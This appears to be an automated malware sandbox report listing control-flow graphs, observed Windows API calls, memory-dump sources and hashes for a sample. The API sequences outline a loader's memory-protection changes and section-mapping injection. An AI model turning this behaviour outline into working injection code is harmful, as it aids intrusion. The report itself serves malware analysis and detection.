                                                                      control_flow_graph 372 4176a3-4176aa 373 4176b0-4176c0 372->373 374 4176c2 373->374 375 4176c8-4176cb 373->375 374->375 375->373 376 4176cd-4176ee LoadLibraryA call 417050 call 417340 375->376 381 4176f0-4176f7 376->381 382 417703-417709 381->382 383 4176f9-4176ff 381->383 384 417710-417717 382->384 385 41770b call 417040 382->385 383->382 388 417726-41772d 384->388 389 417719-417720 InterlockedDecrement 384->389 385->384 388->381 390 41772f-41773f 388->390 389->388 391 417740-417750 390->391 392 417752 391->392 393 417759-41775c 391->393 392->393 393->391 394 41775e-417769 393->394 395 417770-417775 394->395 396 417777-41777d 395->396 397 41777f-417785 395->397 396->397 398 417787-417794 396->398 397->395 397->398
                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00417720
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: DecrementInterlockedLibraryLoad
                                                                      • String ID: k`$}$
                                                                      • API String ID: 1728580480-956986773
                                                                      • Opcode ID: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
                                                                      • Instruction ID: 6a13f396818c81b553958a4f6e0fac96a639a42473e93d8a9fa1ef27fc993d3b
                                                                      • Opcode Fuzzy Hash: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
                                                                      • Instruction Fuzzy Hash: 97213330D886148BCB259F64E8857EA7B30EB49321F11487FD99A972C1CA386CD5CB9D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 400 417050-417190 GetModuleHandleW GetProcAddress VirtualProtect
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041712F
                                                                      • GetProcAddress.KERNEL32(00000000,0041CF58), ref: 0041716C
                                                                      • VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 0041718B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 2099061454-3916222277
                                                                      • Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                      • Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
                                                                      • Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                      • Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 423 2c108b4-2c108cd 424 2c108cf-2c108d1 423->424 425 2c108d3 424->425 426 2c108d8-2c108e4 CreateToolhelp32Snapshot 424->426 425->426 427 2c108f4-2c10901 Module32First 426->427 428 2c108e6-2c108ec 426->428 429 2c10903-2c10904 call 2c10573 427->429 430 2c1090a-2c10912 427->430 428->427 433 2c108ee-2c108f2 428->433 434 2c10909 429->434 433->424 433->427 434->430
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C108DC
                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02C108FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_2c0d000_fbtdajh.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 3833638111-0
                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction ID: 5d25f07cf819e0b114c4b2f4bf236a687dfc93fb76aab7d66538658329c57bd7
                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction Fuzzy Hash: 33F0F6315003116FF7203BF8988EB6E77ECEF8A225F100229EA46910C0DB70E9859BA0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 436 2cf0e0f-2cf0e24 SetErrorMode * 2 437 2cf0e2b-2cf0e2c 436->437 438 2cf0e26 436->438 438->437
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,02CF0223,?,?), ref: 02CF0E19
                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,02CF0223,?,?), ref: 02CF0E1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_2cf0000_fbtdajh.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction ID: f40b6a7c0d257f705cb0e7d4435728bf201dbb2aa5362d75ca5dd7b1c55b98c4
                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction Fuzzy Hash: 97D01231545128B7D7402A94DC09BCD7B1CDF05B66F008011FB0DD9081C770964046E5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 439 4018e6-40194b call 401193 Sleep call 40141f 453 40195a-4019a5 call 401193 439->453 454 40194d-401955 call 401514 439->454 454->453
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                      • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                      • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                      • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 468 401915-401918 469 4018c6-4018c7 468->469 470 40191a-40194b call 401193 Sleep call 40141f 468->470 472 4018d7 469->472 473 4018ce-4018e3 call 401193 469->473 482 40195a-4019a5 call 401193 470->482 483 40194d-401955 call 401514 470->483 472->473 483->482
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                      • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                      • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                      • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 497 4018f1-40194b call 401193 Sleep call 40141f 507 40195a-4019a5 call 401193 497->507 508 40194d-401955 call 401514 497->508 508->507
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                      • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                      • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                      • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                      • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                      • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                      • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C105C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_2c0d000_fbtdajh.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction ID: 97f25e3379db076c3f9a06cca4e7997eef67287c4ba1572baa51eaacf3c5230d
                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction Fuzzy Hash: A8113C79A40208EFDB01DF98C985E99BBF5AF08750F058094F9489B361D771EA90EF80
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                      • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                      • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                      • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                      APIs
                                                                      • LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417684), ref: 00417028
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLocal
                                                                      • String ID:
                                                                      • API String ID: 3494564517-0
                                                                      • Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                      • Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
                                                                      • Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                      • Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10
                                                                      APIs
                                                                      • BuildCommDCBA.KERNEL32(00000000,?), ref: 00417251
                                                                      • WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 00417275
                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041727D
                                                                      • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004172BD
                                                                      • GetComputerNameW.KERNEL32(?,?), ref: 004172D1
                                                                      • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004172DF
                                                                      • OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 004172EE
                                                                      • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004172FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                                      • String ID: -
                                                                      • API String ID: 113859268-2547889144
                                                                      • Opcode ID: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
                                                                      • Instruction ID: c46b0675b47416d80202c3d70281f3f4f52baec69b8f02f40ede2316a1a36d14
                                                                      • Opcode Fuzzy Hash: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
                                                                      • Instruction Fuzzy Hash: 3121DB30A8430CABD7219FA0DC45BDD7B70FB0C751F1140A9FB59AA1C1CAB819C98B59
                                                                      APIs
                                                                      • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417374
                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041738F
                                                                      • HeapDestroy.KERNEL32(00000000), ref: 004173AE
                                                                      • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004173BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                      • String ID:
                                                                      • API String ID: 4159173863-0
                                                                      • Opcode ID: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
                                                                      • Instruction ID: ae621add1e0f4e6c3d705ecf9f7467162fa1ce6b68f8d21c2afe26eea802a05a
                                                                      • Opcode Fuzzy Hash: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
                                                                      • Instruction Fuzzy Hash: D701F7B1A442089BD750EB64ED45BEA37B8EB0C746F41006AFB09E7281DF786D84CF59